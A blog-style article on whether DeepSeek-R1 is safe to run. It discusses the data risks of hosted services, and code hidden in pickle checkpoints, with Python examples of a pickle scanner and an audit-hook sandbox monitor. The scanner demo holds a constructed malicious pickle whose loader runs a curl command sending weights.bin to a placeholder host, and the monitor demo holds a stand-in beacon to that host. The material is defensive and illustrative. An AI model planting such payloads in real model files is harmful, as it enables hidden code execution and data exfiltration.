Is DeepSeek safe?

2025-01-30

In recent days, the company DeepSeek has launched its AI model DeepSeek-R1, which has attracted a lot of attention. It is technically interesting, but its origins in a Chinese company have created uncertainty about how to use it.

Using online services - always a risk

First, one should always be careful when using online services. Whatever you send to the service's servers can, in principle, be used by the provider for any purpose it chooses. This applies especially to free tiers, where there is usually no agreement that restricts such use.

As a paying customer you have a contract with the service, and it may state that the provider will neither store nor otherwise use the data you send. Such clauses are quite common. But as with any promise, you have to decide how far you trust it.

The risk of data being used in other ways or shared with other actors must also be taken into account. Technology companies sometimes work closely with their countries' military and security services, which may be an aspect to consider.

Running on your own hardware - a different situation

If you run the model on your own hardware, the situation is somewhat different. DeepSeek-R1 is published for download, so it can be obtained and run locally with reasonable effort. There have been examples of people running it on a stack of Mac Minis, which is both creative and impressive.

Shouldn't that be risk-free, then? Not quite. An AI model of this type consists not only of data (the weights it learned for all its parameters during training) but also of code: the loading and inference code distributed alongside the weights, and, where the checkpoint is in a pickle-based format, the weight file itself, which is executed rather than merely read when it is loaded.

In that code there could, in principle, be backdoors - for example, a function that collects prompts or outputs and sends them somewhere else, or code that runs on the host as soon as the model file is loaded.
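To make the distinction between data and code concrete, here is an added example in Python (written for this article; it is not code from DeepSeek or from any model repository). It walks the opcode stream of a pickle-based checkpoint without unpickling it and reports every global the pickle references beyond an illustrative allowlist (the allowlist is an assumption for the demo, not a vetted list), and it parses the header of a safetensors file, a format that is pure data. Both sample checkpoints are constructed inline; the malicious one is a harmless stand-in whose payload would only run if someone actually unpickled it.

```python
from __future__ import annotations

import json
import os
import pickle
import pickletools
import struct
from collections import OrderedDict

# Illustrative allowlist: the globals a plain PyTorch state_dict pickle needs.
# This is an assumption for the demo; a production scanner keeps a vetted, versioned list.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
    ("torch", "HalfStorage"),
    ("torch", "BFloat16Storage"),
}


def scan_pickle(data: bytes) -> list[tuple[str, str]]:
    """Return the (module, name) globals a pickle references that are not allowlisted.

    Only the opcode stream is walked (pickletools.genops); nothing is unpickled, so a
    payload hidden in the checkpoint cannot run during the scan. The string/memo
    tracking is a heuristic that is sufficient for pickles written by CPython itself.
    """
    strings: list[str] = []          # string values pushed so far; STACK_GLOBAL uses the last two
    memo: dict[int, object] = {}     # memo slots, kept only for string values
    last: object = None              # most recently pushed value, if it was a string
    referenced: list[tuple[str, str]] = []
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if ("UNICODE" in name or "STRING" in name) and isinstance(arg, str):
            strings.append(arg)
            last = arg
        elif name in ("BINGET", "LONG_BINGET", "GET"):          # recall a memoized value
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        elif name == "MEMOIZE":                                 # protocol 4+: implicit slot number
            memo[len(memo)] = last
        elif name in ("BINPUT", "LONG_BINPUT", "PUT"):           # older protocols: explicit slot
            memo[arg] = last
        else:
            if name == "GLOBAL":                                # protocol <= 3: "module name" in one arg
                module, _, attr = arg.partition(" ")
                referenced.append((module, attr))
            elif name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+: module, name from stack
                referenced.append((strings[-2], strings[-1]))
            last = None
    return [g for g in referenced if g not in ALLOWED_GLOBALS]


class _Exfiltrator:  # constructed malicious object: its pickle calls os.system on load
    def __reduce__(self):
        return (os.system, ("curl -s http://203.0.113.5/c -d @weights.bin",))


def benign_checkpoint() -> bytes:
    """A state_dict-like OrderedDict of plain floats (torch is not needed for the demo)."""
    return pickle.dumps(OrderedDict([("layer.weight", [1.0, 0.0, 0.0, 1.0]),
                                     ("layer.bias", [0.0, 0.0])]))


def malicious_checkpoint() -> bytes:
    """Same shape of data, plus one entry that executes a command when unpickled."""
    return pickle.dumps({"layer.weight": [1.0], "hook": _Exfiltrator()})


def build_safetensors(tensors: dict[str, tuple[str, list[int], bytes]]) -> bytes:
    """Lay tensors out the safetensors way: u64 little-endian header length, JSON header, raw bytes."""
    header: dict = {"__metadata__": {"format": "pt"}}
    blob, offset = bytearray(), 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": shape, "data_offsets": [offset, offset + len(raw)]}
        blob += raw
        offset += len(raw)
    encoded = json.dumps(header).encode()
    return struct.pack("<Q", len(encoded)) + encoded + bytes(blob)


def read_safetensors_header(data: bytes, max_header: int = 100_000_000) -> dict:
    """Read tensor names, dtypes, shapes and byte ranges. There is no code path to execute."""
    (n,) = struct.unpack("<Q", data[:8])
    if n > max_header or 8 + n > len(data):          # sanity cap on the header size
        raise ValueError("header length out of range")
    header = json.loads(data[8:8 + n])
    data_len = len(data) - 8 - n
    for name, meta in header.items():
        if name == "__metadata__":
            continue
        start, end = meta["data_offsets"]
        if not 0 <= start <= end <= data_len:        # offsets must stay inside the file
            raise ValueError(f"{name}: data_offsets outside the file")
    return header


# Constructed sample: a 2x2 identity weight and a zero bias in safetensors layout.
SAFE_CKPT = build_safetensors({
    "layer.weight": ("F32", [2, 2], struct.pack("<4f", 1.0, 0.0, 0.0, 1.0)),
    "layer.bias": ("F32", [2], struct.pack("<2f", 0.0, 0.0)),
})
```

Running `scan_pickle(malicious_checkpoint())` reports a `system` global from the `os` module (spelled `posix` on Linux, `nt` on Windows) that no weight file has any business referencing, while the benign checkpoint reports nothing; `read_safetensors_header(SAFE_CKPT)` returns the tensor table without ever interpreting the payload bytes. The practical rule this illustrates: prefer safetensors, and if a pickle-based checkpoint is the only option, scan it and load it in an isolated environment rather than on a workstation.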

Code from external sources - always a matter of trust

The risk of hidden features is of course not unique to this case. As soon as you install code written by someone else, you trust that it does not contain unexpected features.

We trust whoever provided the operating system, whoever developed the word processor or spreadsheet program, and whoever is behind all the nifty little tools we regularly install. But this trust is never a given - and that goes for AI models too.

Safeguards - sandbox and monitoring

If you are running an AI model, or other software that you are not completely sure about, it should be done in a sandbox where you closely monitor what it does.

For example, check whether the model process tries to open network connections or write files it has no reason to write. Bear in mind that a hidden function may be triggered only after a certain time, or by specific events such as a particular input or a certain number of requests, so a short test run proves little; monitoring has to cover the whole period of use.
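As an added example (not part of the original article), the following Python uses the interpreter's audit hooks, available in CPython since 3.8, to watch a stand-in for a model's loader code: while armed, the monitor blocks outbound socket connections, process spawning and file writes outside a permitted cache directory, and records what was attempted. `untrusted_model_step`, the addresses and the paths it uses are constructed for the demo and do not describe any real model.

```python
from __future__ import annotations

import os
import socket
import sys
import tempfile
from contextlib import contextmanager


class SandboxViolation(RuntimeError):
    """Raised from inside the audited call to abort it. Deliberately not an
    OSError, so socket helpers that swallow OSError cannot hide it."""


class Monitor:
    """Audit-hook monitor: while armed, records and blocks outbound connections,
    process spawning and file writes outside `allowed_dir`."""

    WRITE_FLAGS = os.O_WRONLY | os.O_RDWR | os.O_CREAT | os.O_APPEND

    def __init__(self, allowed_dir: str) -> None:
        self.allowed_dir = os.path.realpath(allowed_dir)
        self.armed = False
        self.violations: list[tuple[str, str]] = []
        sys.addaudithook(self._hook)   # audit hooks cannot be removed; `armed` scopes this one

    @contextmanager
    def watch(self):
        self.armed = True
        try:
            yield self
        finally:
            self.armed = False

    def _deny(self, event: str, detail: str) -> None:
        self.violations.append((event, detail))
        raise SandboxViolation(f"{event} blocked: {detail}")

    def _hook(self, event: str, args: tuple) -> None:
        if not self.armed:
            return
        if event == "socket.connect":                         # args: (socket, address)
            self._deny(event, repr(args[1]))
        elif event in ("os.system", "subprocess.Popen", "os.exec", "os.posix_spawn"):
            self._deny(event, repr(args[0]))                  # args[0]: command or executable
        elif event == "open":                                 # args: (path, mode, flags)
            path, mode, flags = args
            if isinstance(path, int):                         # already-open fd: nothing to decide
                return
            writing = any(c in (mode or "") for c in "wax+") or bool((flags or 0) & self.WRITE_FLAGS)
            if writing:
                real = os.path.realpath(os.fsdecode(path))
                if os.path.commonpath([real, self.allowed_dir]) != self.allowed_dir:
                    self._deny(event, real)


def untrusted_model_step(cache_dir: str) -> dict[str, str]:
    """Constructed stand-in for a model's loader/inference code: one legitimate cache
    write, then two things a sandbox should catch, a phone-home connection and a
    write outside the cache directory."""
    outcome: dict[str, str] = {}
    with open(os.path.join(cache_dir, "kv_cache.bin"), "wb") as f:
        f.write(b"\x00" * 16)
    outcome["cache_write"] = "ok"

    beacon = socket.socket()
    try:
        beacon.settimeout(1)
        beacon.connect(("203.0.113.5", 443))   # TEST-NET-3 address; the hook aborts the call first
        outcome["beacon"] = "sent"
    except SandboxViolation:
        outcome["beacon"] = "blocked"
    finally:
        beacon.close()

    try:
        with open(os.path.join(os.path.dirname(cache_dir), "exfil.txt"), "w") as f:
            f.write("prompt log")
        outcome["exfil_write"] = "written"
    except SandboxViolation:
        outcome["exfil_write"] = "blocked"
    return outcome


def run_demo() -> tuple[dict[str, str], list[tuple[str, str]]]:
    """Run the stand-in under the monitor; return its outcome and what was blocked."""
    with tempfile.TemporaryDirectory() as tmp:
        cache = os.path.join(tmp, "cache")
        os.mkdir(cache)
        monitor = Monitor(cache)
        with monitor.watch():
            outcome = untrusted_model_step(cache)
    return outcome, monitor.violations


if __name__ == "__main__":
    print(run_demo())
```

Audit hooks are in-process and cooperative: they see Python-level operations, not what a native extension or a compiled inference kernel does with raw syscalls, and once installed a hook cannot be removed. Treat this as the inner layer, good for catching low-effort data exfiltration in Python loader code, and put the model inside an OS-level sandbox as the outer layer: a container or VM with no network route, read-only mounts for everything except a scratch directory, and syscall-level tracing of the process. Because a trigger may fire late, keep the monitor armed for the whole session rather than only during a brief smoke test.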

Open source reduces risk, but does not eliminate it

Because DeepSeek-R1 is released openly, with weights and accompanying code available for inspection, the risk of hidden features is probably somewhat lower. So far no such discoveries have been reported, neither for R1 nor for the earlier V3. Note, though, that openness helps mainly with the code: the weights themselves are billions of numbers that cannot be reviewed the way source code can, so behaviour trained into the model would not be found by reading the repository.

It would also be extremely damaging to DeepSeek's reputation if they were caught sneaking Trojans into a model that has received so much attention.

Conclusion - "it depends"

So, is DeepSeek safe? As always, the answer is: it depends.

  • It depends on the data you use.
  • It depends on the operating environment in which you run the model: hosted by someone else, in a cloud where you install it yourself, or on-premises.
  • It depends on how you monitor it.
  • It depends on other aspects that are unique to you and your use.

For all these factors, you need to analyze what threats exist and what could be exposed. DeepSeek is definitely not something to be trusted blindly, but there are certainly ways to try the model and evaluate its performance.
